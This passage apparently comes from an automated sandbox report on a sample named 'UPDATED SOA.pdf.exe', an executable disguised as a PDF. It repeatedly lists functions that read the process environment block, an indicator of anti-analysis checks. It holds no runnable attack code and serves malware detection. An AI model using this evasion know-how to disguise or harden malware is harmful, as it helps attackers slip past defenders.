                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015860B8 mov ecx, dword ptr fs:[00000030h]9_2_015860B8
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015580A8 mov eax, dword ptr fs:[00000030h]9_2_015580A8
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01568350 mov ecx, dword ptr fs:[00000030h]9_2_01568350
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154035C mov eax, dword ptr fs:[00000030h]9_2_0154035C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154035C mov eax, dword ptr fs:[00000030h]9_2_0154035C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154035C mov eax, dword ptr fs:[00000030h]9_2_0154035C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154035C mov ecx, dword ptr fs:[00000030h]9_2_0154035C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154035C mov eax, dword ptr fs:[00000030h]9_2_0154035C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154035C mov eax, dword ptr fs:[00000030h]9_2_0154035C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0158A352 mov eax, dword ptr fs:[00000030h]9_2_0158A352
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]9_2_01542349
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]9_2_01542349
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]9_2_01542349
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]9_2_01542349
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]9_2_01542349
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]9_2_01542349
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]9_2_01542349
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]9_2_01542349
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]9_2_01542349
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]9_2_01542349
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]9_2_01542349
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]9_2_01542349
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]9_2_01542349
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]9_2_01542349
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01542349 mov eax, dword ptr fs:[00000030h]9_2_01542349
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156437C mov eax, dword ptr fs:[00000030h]9_2_0156437C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FA30B mov eax, dword ptr fs:[00000030h]9_2_014FA30B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FA30B mov eax, dword ptr fs:[00000030h]9_2_014FA30B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FA30B mov eax, dword ptr fs:[00000030h]9_2_014FA30B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BC310 mov ecx, dword ptr fs:[00000030h]9_2_014BC310
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E0310 mov ecx, dword ptr fs:[00000030h]9_2_014E0310
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015643D4 mov eax, dword ptr fs:[00000030h]9_2_015643D4
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015643D4 mov eax, dword ptr fs:[00000030h]9_2_015643D4
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CA3C0 mov eax, dword ptr fs:[00000030h]9_2_014CA3C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CA3C0 mov eax, dword ptr fs:[00000030h]9_2_014CA3C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CA3C0 mov eax, dword ptr fs:[00000030h]9_2_014CA3C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CA3C0 mov eax, dword ptr fs:[00000030h]9_2_014CA3C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CA3C0 mov eax, dword ptr fs:[00000030h]9_2_014CA3C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CA3C0 mov eax, dword ptr fs:[00000030h]9_2_014CA3C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C83C0 mov eax, dword ptr fs:[00000030h]9_2_014C83C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C83C0 mov eax, dword ptr fs:[00000030h]9_2_014C83C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C83C0 mov eax, dword ptr fs:[00000030h]9_2_014C83C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C83C0 mov eax, dword ptr fs:[00000030h]9_2_014C83C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156E3DB mov eax, dword ptr fs:[00000030h]9_2_0156E3DB
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156E3DB mov eax, dword ptr fs:[00000030h]9_2_0156E3DB
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156E3DB mov ecx, dword ptr fs:[00000030h]9_2_0156E3DB
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156E3DB mov eax, dword ptr fs:[00000030h]9_2_0156E3DB
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015463C0 mov eax, dword ptr fs:[00000030h]9_2_015463C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0157C3CD mov eax, dword ptr fs:[00000030h]9_2_0157C3CD
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D03E9 mov eax, dword ptr fs:[00000030h]9_2_014D03E9
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D03E9 mov eax, dword ptr fs:[00000030h]9_2_014D03E9
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D03E9 mov eax, dword ptr fs:[00000030h]9_2_014D03E9
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D03E9 mov eax, dword ptr fs:[00000030h]9_2_014D03E9
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D03E9 mov eax, dword ptr fs:[00000030h]9_2_014D03E9
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D03E9 mov eax, dword ptr fs:[00000030h]9_2_014D03E9
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D03E9 mov eax, dword ptr fs:[00000030h]9_2_014D03E9
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D03E9 mov eax, dword ptr fs:[00000030h]9_2_014D03E9
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F63FF mov eax, dword ptr fs:[00000030h]9_2_014F63FF
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014DE3F0 mov eax, dword ptr fs:[00000030h]9_2_014DE3F0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014DE3F0 mov eax, dword ptr fs:[00000030h]9_2_014DE3F0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014DE3F0 mov eax, dword ptr fs:[00000030h]9_2_014DE3F0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E438F mov eax, dword ptr fs:[00000030h]9_2_014E438F
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E438F mov eax, dword ptr fs:[00000030h]9_2_014E438F
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BE388 mov eax, dword ptr fs:[00000030h]9_2_014BE388
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BE388 mov eax, dword ptr fs:[00000030h]9_2_014BE388
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BE388 mov eax, dword ptr fs:[00000030h]9_2_014BE388
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014B8397 mov eax, dword ptr fs:[00000030h]9_2_014B8397
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014B8397 mov eax, dword ptr fs:[00000030h]9_2_014B8397
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014B8397 mov eax, dword ptr fs:[00000030h]9_2_014B8397
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0157A250 mov eax, dword ptr fs:[00000030h]9_2_0157A250
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0157A250 mov eax, dword ptr fs:[00000030h]9_2_0157A250
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C6259 mov eax, dword ptr fs:[00000030h]9_2_014C6259
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01548243 mov eax, dword ptr fs:[00000030h]9_2_01548243
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01548243 mov ecx, dword ptr fs:[00000030h]9_2_01548243
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BA250 mov eax, dword ptr fs:[00000030h]9_2_014BA250
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014B826B mov eax, dword ptr fs:[00000030h]9_2_014B826B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]9_2_01570274
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]9_2_01570274
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]9_2_01570274
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]9_2_01570274
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]9_2_01570274
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]9_2_01570274
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]9_2_01570274
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]9_2_01570274
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]9_2_01570274
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]9_2_01570274
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]9_2_01570274
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01570274 mov eax, dword ptr fs:[00000030h]9_2_01570274
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C4260 mov eax, dword ptr fs:[00000030h]9_2_014C4260
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C4260 mov eax, dword ptr fs:[00000030h]9_2_014C4260
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C4260 mov eax, dword ptr fs:[00000030h]9_2_014C4260
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014B823B mov eax, dword ptr fs:[00000030h]9_2_014B823B
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CA2C3 mov eax, dword ptr fs:[00000030h]9_2_014CA2C3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CA2C3 mov eax, dword ptr fs:[00000030h]9_2_014CA2C3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CA2C3 mov eax, dword ptr fs:[00000030h]9_2_014CA2C3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CA2C3 mov eax, dword ptr fs:[00000030h]9_2_014CA2C3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014CA2C3 mov eax, dword ptr fs:[00000030h]9_2_014CA2C3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D02E1 mov eax, dword ptr fs:[00000030h]9_2_014D02E1
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D02E1 mov eax, dword ptr fs:[00000030h]9_2_014D02E1
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D02E1 mov eax, dword ptr fs:[00000030h]9_2_014D02E1
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FE284 mov eax, dword ptr fs:[00000030h]9_2_014FE284
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FE284 mov eax, dword ptr fs:[00000030h]9_2_014FE284
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01540283 mov eax, dword ptr fs:[00000030h]9_2_01540283
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01540283 mov eax, dword ptr fs:[00000030h]9_2_01540283
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01540283 mov eax, dword ptr fs:[00000030h]9_2_01540283
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D02A0 mov eax, dword ptr fs:[00000030h]9_2_014D02A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D02A0 mov eax, dword ptr fs:[00000030h]9_2_014D02A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015562A0 mov eax, dword ptr fs:[00000030h]9_2_015562A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015562A0 mov ecx, dword ptr fs:[00000030h]9_2_015562A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015562A0 mov eax, dword ptr fs:[00000030h]9_2_015562A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015562A0 mov eax, dword ptr fs:[00000030h]9_2_015562A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015562A0 mov eax, dword ptr fs:[00000030h]9_2_015562A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015562A0 mov eax, dword ptr fs:[00000030h]9_2_015562A0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C8550 mov eax, dword ptr fs:[00000030h]9_2_014C8550
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C8550 mov eax, dword ptr fs:[00000030h]9_2_014C8550
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F656A mov eax, dword ptr fs:[00000030h]9_2_014F656A
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F656A mov eax, dword ptr fs:[00000030h]9_2_014F656A
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F656A mov eax, dword ptr fs:[00000030h]9_2_014F656A
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01556500 mov eax, dword ptr fs:[00000030h]9_2_01556500
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01594500 mov eax, dword ptr fs:[00000030h]9_2_01594500
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01594500 mov eax, dword ptr fs:[00000030h]9_2_01594500
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01594500 mov eax, dword ptr fs:[00000030h]9_2_01594500
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01594500 mov eax, dword ptr fs:[00000030h]9_2_01594500
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01594500 mov eax, dword ptr fs:[00000030h]9_2_01594500
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01594500 mov eax, dword ptr fs:[00000030h]9_2_01594500
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01594500 mov eax, dword ptr fs:[00000030h]9_2_01594500
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EE53E mov eax, dword ptr fs:[00000030h]9_2_014EE53E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EE53E mov eax, dword ptr fs:[00000030h]9_2_014EE53E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EE53E mov eax, dword ptr fs:[00000030h]9_2_014EE53E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EE53E mov eax, dword ptr fs:[00000030h]9_2_014EE53E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EE53E mov eax, dword ptr fs:[00000030h]9_2_014EE53E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0535 mov eax, dword ptr fs:[00000030h]9_2_014D0535
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0535 mov eax, dword ptr fs:[00000030h]9_2_014D0535
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0535 mov eax, dword ptr fs:[00000030h]9_2_014D0535
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0535 mov eax, dword ptr fs:[00000030h]9_2_014D0535
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0535 mov eax, dword ptr fs:[00000030h]9_2_014D0535
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014D0535 mov eax, dword ptr fs:[00000030h]9_2_014D0535
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FE5CF mov eax, dword ptr fs:[00000030h]9_2_014FE5CF
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FE5CF mov eax, dword ptr fs:[00000030h]9_2_014FE5CF
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C65D0 mov eax, dword ptr fs:[00000030h]9_2_014C65D0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FA5D0 mov eax, dword ptr fs:[00000030h]9_2_014FA5D0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FA5D0 mov eax, dword ptr fs:[00000030h]9_2_014FA5D0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FC5ED mov eax, dword ptr fs:[00000030h]9_2_014FC5ED
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FC5ED mov eax, dword ptr fs:[00000030h]9_2_014FC5ED
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EE5E7 mov eax, dword ptr fs:[00000030h]9_2_014EE5E7
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EE5E7 mov eax, dword ptr fs:[00000030h]9_2_014EE5E7
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EE5E7 mov eax, dword ptr fs:[00000030h]9_2_014EE5E7
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EE5E7 mov eax, dword ptr fs:[00000030h]9_2_014EE5E7
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EE5E7 mov eax, dword ptr fs:[00000030h]9_2_014EE5E7
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EE5E7 mov eax, dword ptr fs:[00000030h]9_2_014EE5E7
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EE5E7 mov eax, dword ptr fs:[00000030h]9_2_014EE5E7
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EE5E7 mov eax, dword ptr fs:[00000030h]9_2_014EE5E7
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C25E0 mov eax, dword ptr fs:[00000030h]9_2_014C25E0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F4588 mov eax, dword ptr fs:[00000030h]9_2_014F4588
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C2582 mov eax, dword ptr fs:[00000030h]9_2_014C2582
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C2582 mov ecx, dword ptr fs:[00000030h]9_2_014C2582
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FE59C mov eax, dword ptr fs:[00000030h]9_2_014FE59C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015405A7 mov eax, dword ptr fs:[00000030h]9_2_015405A7
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015405A7 mov eax, dword ptr fs:[00000030h]9_2_015405A7
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015405A7 mov eax, dword ptr fs:[00000030h]9_2_015405A7
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E45B1 mov eax, dword ptr fs:[00000030h]9_2_014E45B1
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E45B1 mov eax, dword ptr fs:[00000030h]9_2_014E45B1
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0157A456 mov eax, dword ptr fs:[00000030h]9_2_0157A456
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FE443 mov eax, dword ptr fs:[00000030h]9_2_014FE443
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FE443 mov eax, dword ptr fs:[00000030h]9_2_014FE443
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FE443 mov eax, dword ptr fs:[00000030h]9_2_014FE443
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FE443 mov eax, dword ptr fs:[00000030h]9_2_014FE443
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FE443 mov eax, dword ptr fs:[00000030h]9_2_014FE443
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FE443 mov eax, dword ptr fs:[00000030h]9_2_014FE443
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FE443 mov eax, dword ptr fs:[00000030h]9_2_014FE443
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014FE443 mov eax, dword ptr fs:[00000030h]9_2_014FE443
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014E245A mov eax, dword ptr fs:[00000030h]9_2_014E245A
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014B645D mov eax, dword ptr fs:[00000030h]9_2_014B645D
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154C460 mov ecx, dword ptr fs:[00000030h]9_2_0154C460
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EA470 mov eax, dword ptr fs:[00000030h]9_2_014EA470
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EA470 mov eax, dword ptr fs:[00000030h]9_2_014EA470
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EA470 mov eax, dword ptr fs:[00000030h]9_2_014EA470
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F8402 mov eax, dword ptr fs:[00000030h]9_2_014F8402
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F8402 mov eax, dword ptr fs:[00000030h]9_2_014F8402
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F8402 mov eax, dword ptr fs:[00000030h]9_2_014F8402
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BE420 mov eax, dword ptr fs:[00000030h]9_2_014BE420
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BE420 mov eax, dword ptr fs:[00000030h]9_2_014BE420
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BE420 mov eax, dword ptr fs:[00000030h]9_2_014BE420
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BC427 mov eax, dword ptr fs:[00000030h]9_2_014BC427
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01546420 mov eax, dword ptr fs:[00000030h]9_2_01546420
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01546420 mov eax, dword ptr fs:[00000030h]9_2_01546420
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01546420 mov eax, dword ptr fs:[00000030h]9_2_01546420
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01546420 mov eax, dword ptr fs:[00000030h]9_2_01546420
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01546420 mov eax, dword ptr fs:[00000030h]9_2_01546420
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01546420 mov eax, dword ptr fs:[00000030h]9_2_01546420
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01546420 mov eax, dword ptr fs:[00000030h]9_2_01546420
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C04E5 mov ecx, dword ptr fs:[00000030h]9_2_014C04E5
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0157A49A mov eax, dword ptr fs:[00000030h]9_2_0157A49A
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154A4B0 mov eax, dword ptr fs:[00000030h]9_2_0154A4B0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C64AB mov eax, dword ptr fs:[00000030h]9_2_014C64AB
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F44B0 mov ecx, dword ptr fs:[00000030h]9_2_014F44B0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502750 mov eax, dword ptr fs:[00000030h]9_2_01502750
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502750 mov eax, dword ptr fs:[00000030h]9_2_01502750
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01544755 mov eax, dword ptr fs:[00000030h]9_2_01544755
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F674D mov esi, dword ptr fs:[00000030h]9_2_014F674D
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F674D mov eax, dword ptr fs:[00000030h]9_2_014F674D
